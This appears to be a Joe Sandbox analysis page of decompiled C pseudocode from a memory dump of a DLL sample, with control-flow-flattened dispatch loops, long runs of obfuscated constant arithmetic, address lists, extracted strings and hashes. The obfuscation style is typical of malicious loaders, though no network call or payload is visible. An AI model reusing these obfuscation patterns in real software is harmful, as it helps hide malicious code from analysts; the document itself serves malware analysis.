				_t764 = 0x2e;
				_v2784 = _v2784 / _t764;
				_v2784 = _v2784 + 0xffffe135;
				_v2784 = _v2784 ^ 0x0005b928;
				_v2852 = 0xf9a739;
				_v2852 = _v2852 | 0x42d1f5c6;
				_v2852 = _v2852 + 0xfffff01c;
				_v2852 = _v2852 ^ 0x42f87d02;
				_v2896 = 0x31e192;
				_v2896 = _v2896 << 0xa;
				_v2896 = _v2896 << 0xa;
				_t765 = 0xb;
				_v2896 = _v2896 * 0x26;
				_v2896 = _v2896 ^ 0xbac011ee;
				_v2928 = 0xcde58e;
				_v2928 = _v2928 | 0x2bdbfaea;
				_v2928 = _v2928 << 8;
				_v2928 = _v2928 | 0x4ddc4764;
				_v2928 = _v2928 ^ 0xdffb1335;
				_v2740 = 0xd63953;
				_v2740 = _v2740 + 0x5c5c;
				_v2740 = _v2740 ^ 0x00d7db1f;
				_v2844 = 0x6db889;
				_v2844 = _v2844 + 0x1eed;
				_v2844 = _v2844 / _t765;
				_v2844 = _v2844 ^ 0x0002c3cf;
				_v2796 = 0x98820d;
				_v2796 = _v2796 | 0x8cff8acf;
				_t766 = 0x43;
				_v2796 = _v2796 / _t766;
				_v2796 = _v2796 ^ 0x021946ce;
				_v2668 = 0x18627d;
				_t767 = 7;
				_v2668 = _v2668 / _t767;
				_v2668 = _v2668 ^ 0x00044156;
				_v2772 = 0x2c7378;
				_v2772 = _v2772 >> 0xb;
				_v2772 = _v2772 >> 6;
				_v2772 = _v2772 ^ 0x000b6d9a;
				_v2880 = 0xd4c7fd;
				_t768 = 0x7b;
				_v2880 = _v2880 / _t768;
				_v2880 = _v2880 + 0xffffaacc;
				_t769 = 0x22;
				_v2880 = _v2880 * 0x2f;
				_v2880 = _v2880 ^ 0x00480dcd;
				_v2920 = 0xe4d6f8;
				_v2920 = _v2920 * 0x42;
				_v2920 = _v2920 + 0xa0b6;
				_v2920 = _v2920 << 8;
				_v2920 = _v2920 ^ 0x000574ec;
				_v2640 = 0xd6ae6b;
				_v2640 = _v2640 | 0xbe6f316b;
				_v2640 = _v2640 ^ 0xbefadf9c;
				_v2836 = 0x6fb4;
				_v2836 = _v2836 + 0xffffc368;
				_v2836 = _v2836 >> 0x10;
				_v2836 = _v2836 ^ 0x0009680a;
				_v2724 = 0x8b61bc;
				_v2724 = _v2724 * 0x75;
				_v2724 = _v2724 ^ 0x3fbdc7d4;
				_v2912 = 0x753704;
				_v2912 = _v2912 >> 0xb;
				_v2912 = _v2912 + 0xd457;
				_v2912 = _v2912 << 1;
				_v2912 = _v2912 ^ 0x000d652f;
				_v2716 = 0xde59a0;
				_v2716 = _v2716 + 0xffff5778;
				_v2716 = _v2716 ^ 0x00d8a7a4;
				_v2752 = 0x428dcf;
				_v2752 = _v2752 / _t769;
				_v2752 = _v2752 | 0x08d5d60c;
				_v2752 = _v2752 ^ 0x08d7d48c;
				_v2828 = 0xe83a42;
				_v2828 = _v2828 ^ 0x1f3eb5e2;
				_v2828 = _v2828 * 0x7e;
				_v2828 = _v2828 ^ 0xab9e63e1;
				_v2788 = 0x69d445;
				_v2788 = _v2788 | 0x87a4a8ed;
				_v2788 = _v2788 ^ 0x9a4d3e24;
				_v2788 = _v2788 ^ 0x1da0be74;
				_v2888 = 0x7663d0;
				_v2888 = _v2888 | 0x8f53a1f3;
				_v2888 = _v2888 >> 0xf;
				_v2888 = _v2888 * 0xa;
				_v2888 = _v2888 ^ 0x000d5ba1;
				_v2644 = 0x20e74e;
				_v2644 = _v2644 | 0x742f98e9;
				_v2644 = _v2644 ^ 0x74210d1b;
				_v2904 = 0xfccdb4;
				_t770 = 0xd;
				_v2904 = _v2904 * 0x7c;
				_v2904 = _v2904 >> 0xd;
				_v2904 = _v2904 | 0x17cf49de;
				_v2904 = _v2904 ^ 0x17c7aae5;
				_v2708 = 0xc1d2f2;
				_v2708 = _v2708 + 0xffff5a94;
				_v2708 = _v2708 ^ 0x00cb5d75;
				_v2660 = 0x58d6fe;
				_v2660 = _v2660 + 0x639e;
				_v2660 = _v2660 ^ 0x00518056;
				_v2652 = 0x6bd84b;
				_v2652 = _v2652 + 0xb95a;
				_v2652 = _v2652 ^ 0x00624667;
				_v2700 = 0xf92c4f;
				_v2700 = _v2700 * 0x75;
				_v2700 = _v2700 ^ 0x71e1c3ce;
				_v2892 = 0xd4714c;
				_v2892 = _v2892 + 0xffffadfa;
				_v2892 = _v2892 + 0xd7d2;
				_v2892 = _v2892 << 2;
				_v2892 = _v2892 ^ 0x0358083c;
				_v2900 = 0xca6485;
				_v2900 = _v2900 ^ 0x66674751;
				_v2900 = _v2900 | 0x9fb8fe7f;
				_v2900 = _v2900 ^ 0xffb729be;
				_v2824 = 0x9c46e2;
				_v2824 = _v2824 / _t770;
				_t771 = 0x6e;
				_v2824 = _v2824 * 7;
				_v2824 = _v2824 ^ 0x005409ff;
				_v2832 = 0x773d17;
				_v2832 = _v2832 >> 0xe;
				_v2832 = _v2832 + 0x6313;
				_v2832 = _v2832 ^ 0x000d17fa;
				_v2792 = 0x3014cc;
				_v2792 = _v2792 + 0xffff152c;
				_v2792 = _v2792 + 0xffff3bdf;
				_v2792 = _v2792 ^ 0x002eea21;
				_v2864 = 0x76e575;
				_v2864 = _v2864 | 0xb1b1a986;
				_v2864 = _v2864 * 0x79;
				_v2864 = _v2864 ^ 0x1e28dcc7;
				_v2712 = 0xf7e6ad;
				_v2712 = _v2712 * 0xb;
				_v2712 = _v2712 ^ 0x0aae7ee0;
				_v2808 = 0xd4cb39;
				_v2808 = _v2808 * 0x50;
				_v2808 = _v2808 * 0x75;
				_v2808 = _v2808 ^ 0x6440f87f;
				_v2720 = 0x360163;
				_v2720 = _v2720 + 0xffffc3fc;
				_v2720 = _v2720 ^ 0x0035ed30;
				_v2816 = 0xf63972;
				_v2816 = _v2816 / _t771;
				_v2816 = _v2816 + 0xffff69c4;
				_v2816 = _v2816 ^ 0x0001f3af;
				_v2728 = 0x218a6d;
				_v2728 = _v2728 | 0x0e9fd07f;
				_v2728 = _v2728 ^ 0x0eb1edc0;
				_v2756 = 0x58a84f;
				_v2756 = _v2756 * 0x22;
				_t772 = 0x3d;
				_v2756 = _v2756 / _t772;
				_v2756 = _v2756 ^ 0x0033367e;
				_v2680 = 0x526d89;
				_v2680 = _v2680 << 3;
				_v2680 = _v2680 ^ 0x02908fe9;
				_v2876 = 0xb95aa0;
				_t773 = 0x6f;
				_v2876 = _v2876 / _t773;
				_v2876 = _v2876 + 0x7ba5;
				_v2876 = _v2876 | 0x4bff3dbe;
				_v2876 = _v2876 ^ 0x4bf5695e;
				_v2748 = 0x470f02;
				_t774 = 0x6a;
				_v2748 = _v2748 / _t774;
				_v2748 = _v2748 ^ 0x394a4d48;
				_v2748 = _v2748 ^ 0x39498008;
				_v2684 = 0xb8f542;
				_v2684 = _v2684 * 0x66;
				_v2684 = _v2684 ^ 0x49b10479;
				_v2812 = 0x4a6932;
				_v2812 = _v2812 >> 7;
				_v2812 = _v2812 ^ 0xe4afcb01;
				_v2812 = _v2812 ^ 0xe4ae05c3;
				_v2932 = 0xa851a7;
				_v2932 = _v2932 * 0x2b;
				_v2932 = _v2932 ^ 0x9481cb07;
				_v2932 = _v2932 >> 6;
				_v2932 = _v2932 ^ 0x02246e93;
				_v2872 = 0x6bc7af;
				_v2872 = _v2872 ^ 0x3226b467;
				_v2872 = _v2872 * 0x1e;
				_v2872 = _v2872 << 0xb;
				_v2872 = _v2872 ^ 0x9c8deb19;
				_v2860 = 0x8556fb;
				_v2860 = _v2860 | 0x69e02514;
				_v2860 = _v2860 + 0xedcb;
				_v2860 = _v2860 ^ 0x69e8258b;
				_v2676 = 0xb187db;
				_v2676 = _v2676 << 0xb;
				_v2676 = _v2676 ^ 0x8c3acae2;
				_v2656 = 0xd34daf;
				_v2656 = _v2656 >> 0xe;
				_v2656 = _v2656 ^ 0x0009be95;
				_v2804 = 0x3574a6;
				_v2804 = _v2804 >> 9;
				_v2804 = _v2804 * 0x2a;
				_v2804 = _v2804 ^ 0x00009063;
				_v2760 = 0x8f0143;
				_v2760 = _v2760 * 0x43;
				_v2760 = _v2760 >> 3;
				_v2760 = _v2760 ^ 0x04abe301;
				_v2924 = 0x8fc82d;
				_v2924 = _v2924 << 1;
				_v2924 = _v2924 | 0xafdefbbe;
				_v2924 = _v2924 ^ 0xafdce921;
				_v2840 = 0x98b351;
				_v2840 = _v2840 << 0xe;
				_v2840 = _v2840 + 0x39e2;
				_v2840 = _v2840 ^ 0x2cd1b69a;
				_v2648 = 0xefee4b;
				_v2648 = _v2648 + 0xffff46f9;
				_v2648 = _v2648 ^ 0x00ec21a4;
				_v2848 = 0xd96457;
				_v2848 = _v2848 * 0x6c;
				_v2848 = _v2848 ^ 0xa04c0af4;
				_v2848 = _v2848 ^ 0xfbfff8f9;
				_v2856 = 0xd54255;
				_t775 = 0x29;
				_v2856 = _v2856 / _t775;
				_v2856 = _v2856 + 0x5db9;
				_v2856 = _v2856 ^ 0x00024640;
				_v2780 = 0x684df0;
				_v2780 = _v2780 ^ 0x2cfc36b9;
				_v2780 = _v2780 + 0xffffad37;
				_v2780 = _v2780 ^ 0x2c920bcc;
				_v2664 = 0x93e9a1;
				_v2664 = _v2664 ^ 0xb0758ee6;
				_v2664 = _v2664 ^ 0xb0e547c8;
				_v2692 = 0xe0a4a1;
				_v2692 = _v2692 << 0x10;
				_v2692 = _v2692 ^ 0xa4a3a3bd;
				_v2820 = 0x53ca07;
				_t776 = 0x38;
				_v2820 = _v2820 / _t776;
				_v2820 = _v2820 ^ 0x69a52d4a;
				_v2820 = _v2820 ^ 0x69a742e5;
				_v2768 = 0x45adf5;
				_t777 = 0x28;
				_v2768 = _v2768 / _t777;
				_t778 = 0x33;
				_v2768 = _v2768 * 0x6f;
				_v2768 = _v2768 ^ 0x00c7348a;
				_v2672 = 0xa3622d;
				_v2672 = _v2672 * 0x68;
				_v2672 = _v2672 ^ 0x42518aaf;
				_v2732 = 0xe7d257;
				_v2732 = _v2732 << 0xc;
				_v2732 = _v2732 ^ 0x7d2b6ce8;
				_v2908 = 0xb6fcc8;
				_v2908 = _v2908 / _t778;
				_t779 = 0x63;
				_v2908 = _v2908 * 0x4f;
				_v2908 = _v2908 / _t779;
				_v2908 = _v2908 ^ 0x0008aa55;
				_v2736 = 0xa2e201;
				_t780 = 0x24;
				_v2736 = _v2736 / _t780;
				_v2736 = _v2736 ^ 0x0004c10d;
				_v2916 = 0xc480dc;
				_v2916 = _v2916 + 0xffff6830;
				_v2916 = _v2916 << 0xc;
				_v2916 = _v2916 >> 3;
				_v2916 = _v2916 ^ 0x07d4cd30;
				_v2744 = 0x29dac5;
				_v2744 = _v2744 + 0xffff883e;
				_v2744 = _v2744 ^ 0x002f91a3;
				_v2868 = 0xe49a6a;
				_v2868 = _v2868 + 0xb047;
				_v2868 = _v2868 ^ 0x5e8c4957;
				_v2868 = _v2868 * 0x36;
				_v2868 = _v2868 ^ 0xea21adfb;
				_t731 = E00D51F6D(_t780);
				_t860 = _v2744;
				_t761 = _t731;
				goto L1;
				do {
					while(1) {
						L1:
						_t874 = _t861 - 0x6dbb171;
						if(_t874 > 0) {
							break;
						}
						if(_t874 == 0) {
							E00D52B09(_v2908, _v2636, _v2736, _v2916);
							_pop(_t783);
							_t861 = 0x240e9e1;
							continue;
						} else {
							if(_t861 == 0xb8f10d) {
								_push(_v2872);
								_push(_v2932);
								_push(_v2812);
								_t865 = E00D4E1F8(0xd319bc, _v2684, __eflags);
								E00D544AD(_v2676, __eflags, _v2656,  &_v1044,  &_v2604, _v2804, _v2760, _t865,  &_v524, _t860, _v2924);
								_t783 = _t865;
								E00D4FECB(_t783, _v2840, _v2648, _v2848, _v2856);
								_t868 =  &(_t868[0xf]);
								_t861 = 0x1618198;
								continue;
							} else {
								if(_t861 == 0x1618198) {
									_push(_t783);
									_t783 = _v2780;
									_t743 = E00D485FF(_t783, _v2664, __eflags, 0,  &_v1044, 0, _v2692, 1, _v2820);
									_t868 =  &(_t868[7]);
									_t861 = 0x2876e66;
									continue;
								} else {
									if(_t861 == 0x1d2207b) {
										E00D50DB1(_v2852,  &_v2084, __eflags, _v2896, _t783, _v2928);
										 *((short*)(E00D409DD(_v2740,  &_v2084, _v2844, _v2796))) = 0;
										E00D3BAA9(_v2668, _v2772, __eflags, _v2880, _v2920,  &_v1564);
										_push(_v2912);
										_push(_v2724);
										_push(_v2836);
										E00D52D0A(_v2752, __eflags,  &_v1564, _v2828, _v2788, _v2888, 0xd3188c,  &_v2604,  &_v2084, E00D4E1F8(0xd3188c, _v2640, __eflags));
										E00D4FECB(_t748, _v2644, _v2904, _v2708, _v2660);
										_t868 =  &(_t868[0x16]);
										_t743 = E00D3BFBE( &_v2604, _t867, _v2700);
										_pop(_t783);
										__eflags = _t743;
										if(__eflags != 0) {
											_t861 = 0xf749c26;
											continue;
										}
									} else {
										if(_t861 == 0x240e9e1) {
											return E00D51538(_v2744, _v2868, _v2628);
										}
										if(_t861 != 0x2876e66) {
											goto L25;
										} else {
											_t743 = E00D52B09(_v2768, _t860, _v2672, _v2732);
											_pop(_t783);
											_t861 = 0x6dbb171;
											continue;
										}
										L29:
									}
								}
							}
						}
						L28:
						return _t743;
						goto L29;
					}
					__eflags = _t861 - 0x9e42b00;
					if(_t861 == 0x9e42b00) {
						_t732 = E00D50A64(_v2632, _v2636, _v2876, _v2748);
						_t860 = _t732;
						_pop(_t783);
						__eflags = _t732;
						if(__eflags == 0) {
							_t861 = 0x6dbb171;
							goto L25;
						} else {
							_t861 = 0xb8f10d;
							goto L1;
						}
						goto L29;
					} else {
						__eflags = _t861 - 0xa108a7f;
						if(_t861 == 0xa108a7f) {
							_t659 =  &_v2756; // 0x33367e
							_t733 = E00D4D8DB( &_v2628,  &_v2636,  *_t659, _v2680);
							asm("sbb esi, esi");
							_pop(_t783);
							_t861 = ( ~_t733 & 0x07a3411f) + 0x240e9e1;
							goto L1;
						} else {
							__eflags = _t861 - 0xbf2cce3;
							if(_t861 == 0xbf2cce3) {
								_t653 =  &_v2764; // 0x33367e
								_t783 = _v2688;
								E00D31A34(_t783,  &_v524, _t783, _t783, _v2884, _v2696,  *_t653, _t783, _v2776, _v2784);
								_t868 =  &(_t868[8]);
								_t861 = 0x1d2207b;
								goto L1;
							} else {
								__eflags = _t861 - 0xf749c26;
								if(_t861 != 0xf749c26) {
									goto L25;
								} else {
									_v2624 = E00D40CF9();
									_t758 = E00D400C5(_t757, _v2824, _v2832);
									_pop(_t804);
									_v2620 = 2 + _t758 * 2;
									_t783 = _v2792;
									_t743 = E00D3F726(_t783, _v2704, _v2864, _t761, _v2712, _t761, _t761, _v2808, _t804,  &_v2628, _v2720, _v2816, _t804, _v2728);
									_t868 =  &(_t868[0xc]);
									__eflags = _t743;
									if(__eflags != 0) {
										_t861 = 0xa108a7f;
										goto L1;
									}
								}
							}
						}
					}
					goto L28;
					L25:
					__eflags = _t861 - 0x7aa6196;
				} while (__eflags != 0);
				return _t743;
			}

0x00d3a871
0x00d3a877
0x00d3a881
0x00d3a889
0x00d3a894
0x00d3a89f
0x00d3a8aa
0x00d3a8b5
0x00d3a8c0
0x00d3a8cb
0x00d3a8d6
0x00d3a8e1
0x00d3a8ec
0x00d3a8f7
0x00d3a902
0x00d3a90d
0x00d3a918
0x00d3a923
0x00d3a92b
0x00d3a938
0x00d3a93c
0x00d3a943
0x00d3a94a
0x00d3a94d
0x00d3a951
0x00d3a959
0x00d3a96f
0x00d3a976
0x00d3a981
0x00d3a98c
0x00d3a997
0x00d3a99f
0x00d3a9aa
0x00d3a9bc
0x00d3a9c1
0x00d3a9ca
0x00d3a9d5
0x00d3a9e0
0x00d3a9e8
0x00d3a9f0
0x00d3a9f8
0x00d3aa00
0x00d3aa08
0x00d3aa0d
0x00d3aa17
0x00d3aa18
0x00d3aa1c
0x00d3aa24
0x00d3aa2c
0x00d3aa34
0x00d3aa39
0x00d3aa41
0x00d3aa49
0x00d3aa54
0x00d3aa5f
0x00d3aa6a
0x00d3aa72
0x00d3aa80
0x00d3aa84
0x00d3aa8c
0x00d3aa97
0x00d3aaad
0x00d3aab2
0x00d3aabb
0x00d3aac6
0x00d3aad8
0x00d3aadd
0x00d3aae6
0x00d3aaf1
0x00d3aafc
0x00d3ab04
0x00d3ab0c
0x00d3ab17
0x00d3ab23
0x00d3ab28
0x00d3ab2e
0x00d3ab3b
0x00d3ab3c
0x00d3ab40
0x00d3ab48
0x00d3ab55
0x00d3ab59
0x00d3ab61
0x00d3ab66
0x00d3ab6e
0x00d3ab79
0x00d3ab84
0x00d3ab8f
0x00d3ab97
0x00d3ab9f
0x00d3aba4
0x00d3abac
0x00d3abbf
0x00d3abc6
0x00d3abd1
0x00d3abd9
0x00d3abde
0x00d3abe6
0x00d3abea
0x00d3abf2
0x00d3abfd
0x00d3ac08
0x00d3ac13
0x00d3ac27
0x00d3ac2e
0x00d3ac39
0x00d3ac44
0x00d3ac4c
0x00d3ac59
0x00d3ac5d
0x00d3ac65
0x00d3ac70
0x00d3ac7b
0x00d3ac86
0x00d3ac91
0x00d3ac99
0x00d3aca1
0x00d3acab
0x00d3acaf
0x00d3acb7
0x00d3acc2
0x00d3accd
0x00d3acd8
0x00d3ace9
0x00d3acec
0x00d3acf0
0x00d3acf5
0x00d3acfd
0x00d3ad05
0x00d3ad10
0x00d3ad1b
0x00d3ad26
0x00d3ad31
0x00d3ad3c
0x00d3ad47
0x00d3ad52
0x00d3ad5d
0x00d3ad68
0x00d3ad7b
0x00d3ad82
0x00d3ad8d
0x00d3ad95
0x00d3ad9d
0x00d3ada5
0x00d3adaa
0x00d3adb2
0x00d3adba
0x00d3adc2
0x00d3adca
0x00d3add2
0x00d3ade8
0x00d3adf7
0x00d3adfa
0x00d3ae01
0x00d3ae0c
0x00d3ae14
0x00d3ae19
0x00d3ae21
0x00d3ae29
0x00d3ae34
0x00d3ae3f
0x00d3ae4a
0x00d3ae55
0x00d3ae5d
0x00d3ae6a
0x00d3ae6e
0x00d3ae76
0x00d3ae89
0x00d3ae90
0x00d3ae9b
0x00d3aeae
0x00d3aebd
0x00d3aec4
0x00d3aecf
0x00d3aeda
0x00d3aee5
0x00d3aef0
0x00d3af04
0x00d3af0b
0x00d3af16
0x00d3af21
0x00d3af2c
0x00d3af37
0x00d3af42
0x00d3af57
0x00d3af65
0x00d3af6a
0x00d3af73
0x00d3af7e
0x00d3af89
0x00d3af91
0x00d3af9c
0x00d3afa8
0x00d3afad
0x00d3afb3
0x00d3afbb
0x00d3afc3
0x00d3afcb
0x00d3afdd
0x00d3afe0
0x00d3afe7
0x00d3aff2
0x00d3affd
0x00d3b010
0x00d3b017
0x00d3b022
0x00d3b02d
0x00d3b035
0x00d3b040
0x00d3b04b
0x00d3b058
0x00d3b05c
0x00d3b064
0x00d3b069
0x00d3b071
0x00d3b079
0x00d3b086
0x00d3b08a
0x00d3b08f
0x00d3b097
0x00d3b09f
0x00d3b0a7
0x00d3b0af
0x00d3b0b7
0x00d3b0c2
0x00d3b0ca
0x00d3b0d5
0x00d3b0e0
0x00d3b0e8
0x00d3b0f3
0x00d3b0fe
0x00d3b10e
0x00d3b115
0x00d3b120
0x00d3b133
0x00d3b13a
0x00d3b142
0x00d3b14d
0x00d3b155
0x00d3b159
0x00d3b161
0x00d3b169
0x00d3b171
0x00d3b176
0x00d3b17e
0x00d3b186
0x00d3b191
0x00d3b19c
0x00d3b1a7
0x00d3b1b4
0x00d3b1b8
0x00d3b1c0
0x00d3b1ca
0x00d3b1d8
0x00d3b1dd
0x00d3b1e3
0x00d3b1eb
0x00d3b1f3
0x00d3b1fe
0x00d3b209
0x00d3b214
0x00d3b21f
0x00d3b22a
0x00d3b235
0x00d3b240
0x00d3b24b
0x00d3b253
0x00d3b25e
0x00d3b270
0x00d3b275
0x00d3b27e
0x00d3b289
0x00d3b294
0x00d3b2a6
0x00d3b2ab
0x00d3b2bc
0x00d3b2bf
0x00d3b2c6
0x00d3b2d1
0x00d3b2e4
0x00d3b2eb
0x00d3b2f6
0x00d3b301
0x00d3b309
0x00d3b314
0x00d3b324
0x00d3b32d
0x00d3b330
0x00d3b33c
0x00d3b340
0x00d3b348
0x00d3b35a
0x00d3b35d
0x00d3b364
0x00d3b36f
0x00d3b377
0x00d3b37f
0x00d3b384
0x00d3b389
0x00d3b391
0x00d3b39c
0x00d3b3a7
0x00d3b3b2
0x00d3b3ba
0x00d3b3c2
0x00d3b3cf
0x00d3b3d3
0x00d3b3e2
0x00d3b3e7
0x00d3b3ee
0x00d3b3ee
0x00d3b3f0
0x00d3b3f0
0x00d3b3f0
0x00d3b3f0
0x00d3b3f6
0x00000000
0x00000000
0x00d3b3fc
0x00d3b668
0x00d3b66e
0x00d3b66f
0x00000000
0x00d3b402
0x00d3b408
0x00d3b5b7
0x00d3b5c0
0x00d3b5c4
0x00d3b5da
0x00d3b61d
0x00d3b629
0x00d3b640
0x00d3b645
0x00d3b648
0x00000000
0x00d3b40e
0x00d3b414
0x00d3b57a
0x00d3b599
0x00d3b5a5
0x00d3b5aa
0x00d3b5ad
0x00000000
0x00d3b41a
0x00d3b420
0x00d3b473
0x00d3b49b
0x00d3b4bc
0x00d3b4c9
0x00d3b4cd
0x00d3b4d4
0x00d3b523
0x00d3b543
0x00d3b548
0x00d3b561
0x00d3b567
0x00d3b568
0x00d3b56a
0x00d3b570
0x00000000
0x00d3b570
0x00d3b422
0x00d3b428
0x00000000
0x00d3b814
0x00d3b434
0x00000000
0x00d3b43a
0x00d3b451
0x00d3b457
0x00d3b458
0x00000000
0x00d3b458
0x00000000
0x00d3b434
0x00d3b420
0x00d3b414
0x00d3b408
0x00d3b81f
0x00d3b81f
0x00000000
0x00d3b81f
0x00d3b679
0x00d3b67f
0x00d3b7d3
0x00d3b7d8
0x00d3b7db
0x00d3b7dc
0x00d3b7de
0x00d3b7ea
0x00000000
0x00d3b7e0
0x00d3b7e0
0x00000000
0x00d3b7e0
0x00000000
0x00d3b685
0x00d3b685
0x00d3b68b
0x00d3b78e
0x00d3b79c
0x00d3b7a6
0x00d3b7ae
0x00d3b7af
0x00000000
0x00d3b691
0x00d3b691
0x00d3b697
0x00d3b753
0x00d3b767
0x00d3b76e
0x00d3b773
0x00d3b776
0x00000000
0x00d3b69d
0x00d3b69d
0x00d3b6a3
0x00000000
0x00d3b6a9
0x00d3b6c3
0x00d3b6ca
0x00d3b6cf
0x00d3b6ed
0x00d3b71c
0x00d3b723
0x00d3b728
0x00d3b72b
0x00d3b72d
0x00d3b733
0x00000000
0x00d3b733
0x00d3b72d
0x00d3b6a3
0x00d3b697
0x00d3b68b
0x00000000
0x00d3b7ef
0x00d3b7ef
0x00d3b7ef
0x00000000

Strings

\\, xrefs: 00D3AA54
B:, xrefs: 00D3AC44
$P, xrefs: 00D3A936
h, xrefs: 00D3ABA4
HMJ9, xrefs: 00D3AFE7
BbJ, xrefs: 00D3A981
~63, xrefs: 00D3AC1E, 00D3AF5E, 00D3AF4D
QGgf, xrefs: 00D3ADBA
uv, xrefs: 00D3AE55
K, xrefs: 00D3B186
~63, xrefs: 00D3B753
l+}, xrefs: 00D3B309
2iJ, xrefs: 00D3B022
N , xrefs: 00D3ACB7
05, xrefs: 00D3AEE5
xs,, xrefs: 00D3AAF1
!., xrefs: 00D3AE4A
9, xrefs: 00D3B176
/e, xrefs: 00D3ABEA

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: h$!.$$P$/e$05$2iJ$B:$BbJ$HMJ9$K$N $QGgf$\\$uv$xs,$~63$~63$9$l+}
API String ID: 0-4215899151
Opcode ID: 437e79085a0c3c7316feddeb10dc2faf93a77836d578da1f9a1a63f51bf7eb6d
Instruction ID: 12eb04fea85fa2ad0fffa51b9f8f169ad11437e358c74b61e12df0fff0c4f440
Opcode Fuzzy Hash: 437e79085a0c3c7316feddeb10dc2faf93a77836d578da1f9a1a63f51bf7eb6d
Instruction Fuzzy Hash: BE72EE725083819FD378CF21D54AB8BBBE2FBC4314F10891EE6D996260DBB19948CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00D40F86, Relevance: 23.2, Strings: 18, Instructions: 723
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00D40F86(intOrPtr* __ecx) {
				char _v68;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr* _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				void* _t824;
				void* _t825;
				void* _t829;
				void* _t832;
				void* _t844;
				void* _t850;
				void* _t853;
				signed int _t860;
				signed int _t861;
				signed int _t862;
				signed int _t863;
				signed int _t864;
				signed int _t865;
				signed int _t866;
				signed int _t867;
				signed int _t868;
				signed int _t869;
				signed int _t870;
				signed int _t871;
				signed int _t872;
				signed int _t873;
				signed int _t874;
				signed int _t875;
				signed int _t876;
				void* _t882;
				void* _t901;
				void* _t957;
				intOrPtr _t975;
				intOrPtr* _t978;
				signed int _t980;
				signed int _t981;
				void* _t982;
				intOrPtr _t986;
				void* _t987;
				void* _t994;
				void* _t996;

				_t978 = __ecx;
				_v96 = __ecx;
				_v88 = 0xce16ef;
				_t986 = 0;
				_t853 = 0x87433f6;
				_v84 = 0;
				_v80 = 0;
				_v412 = 0xef09b0;
				_v412 = _v412 + 0xffff239a;
				_v412 = _v412 >> 0xe;
				_v412 = _v412 + 0xffffb1af;
				_v412 = _v412 ^ 0xffffb567;
				_v144 = 0xb2550e;
				_v144 = _v144 << 6;
				_v144 = _v144 ^ 0x2c954380;
				_v160 = 0xa1df5c;
				_v160 = _v160 * 0x60;
				_v160 = _v160 ^ 0x3cb3c280;
				_v288 = 0x7a32d8;
				_v288 = _v288 | 0x8c6c9666;
				_v288 = _v288 ^ 0x041f8caf;
				_v288 = _v288 ^ 0x88613a51;
				_v348 = 0xdf5e12;
				_v348 = _v348 | 0xa5ea5eb7;
				_v348 = _v348 ^ 0xa5ff5eb7;
				_v296 = 0x7009ff;
				_v296 = _v296 + 0xffff1527;
				_v296 = _v296 + 0x576a;
				_v296 = _v296 ^ 0x006f7690;
				_v372 = 0x1f54b;
				_t860 = 0x52;
				_v372 = _v372 * 0x5a;
				_v372 = _v372 >> 0xb;
				_v372 = _v372 / _t860;
				_v372 = _v372 ^ 0x00000044;
				_v332 = 0x772df1;
				_v332 = _v332 + 0x4853;
				_v332 = _v332 ^ 0x166147d5;
				_v332 = _v332 ^ 0x16163191;
				_v240 = 0x1a1abb;
				_v240 = _v240 ^ 0xbdfc81b5;
				_v240 = _v240 | 0x1ef02f35;
				_v240 = _v240 ^ 0xbff6bf3f;
				_v232 = 0x620327;
				_v232 = _v232 + 0xffffc934;
				_t861 = 0x13;
				_v232 = _v232 / _t861;
				_v232 = _v232 ^ 0x000525b3;
				_v208 = 0xe2fff2;
				_t980 = 0x39;
				_v208 = _v208 * 0x78;
				_v208 = _v208 ^ 0x6a67f970;
				_v344 = 0xf3734c;
				_v344 = _v344 >> 0x10;
				_v344 = _v344 / _t980;
				_v344 = _v344 ^ 0x00000004;
				_v300 = 0x170e40;
				_v300 = _v300 | 0xfbde795f;
				_v300 = _v300 ^ 0xfbde9330;
				_v260 = 0xd4f3ae;
				_v260 = _v260 ^ 0x9e22b963;
				_v260 = _v260 * 0x2e;
				_v260 = _v260 ^ 0x904fea8f;
				_v356 = 0x4c8d9b;
				_v356 = _v356 | 0xd47535dd;
				_v356 = _v356 + 0xffffd433;
				_t862 = 0x64;
				_v356 = _v356 * 0x59;
				_v356 = _v356 ^ 0xdfa15942;
				_v308 = 0xbd9260;
				_v308 = _v308 >> 0xe;
				_v308 = _v308 * 0x79;
				_v308 = _v308 ^ 0x000cbe7b;
				_v252 = 0xa2f51d;
				_v252 = _v252 + 0x749;
				_v252 = _v252 << 0xd;
				_v252 = _v252 ^ 0x5f854687;
